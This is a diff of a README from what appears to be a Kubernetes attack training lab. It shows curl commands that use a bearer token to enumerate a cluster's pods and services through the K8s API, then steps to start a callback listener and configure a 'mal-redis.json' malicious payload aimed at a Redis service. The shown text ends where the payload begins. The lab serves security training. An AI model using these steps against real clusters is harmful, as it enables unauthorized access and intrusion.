we45/container_training/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/README.md

 * Let's start interacting with K8s API

     `curl -s https://10.96.0.1/api/v1/namespaces/default/pods -XGET -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" --insecure`

     `curl -s https://10.96.0.1/api/v1/namespaces/default/services -XGET -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" --insecure`

-You should see a JSON Dump of all the pods running in the cluster at this time
+You should see a JSON Dump of all the pods and services running in the cluster at this time

+Note `clusterIP` of the `redis-service` Service.

+Open a new tab in terminal and launch a web-server by running `./tornado_server.py`

+Change the value of `MASTERHOST` with the value of `clusterIP`.

+Change the value of `LISTENER_IP` with the VM IP that can be fetched by running `ifconfig`

+Change the value of `LISTENER_PORT` to the port web-server is running on(`9090`)

 ```
 cat > mal-redis.json <<EOF
 {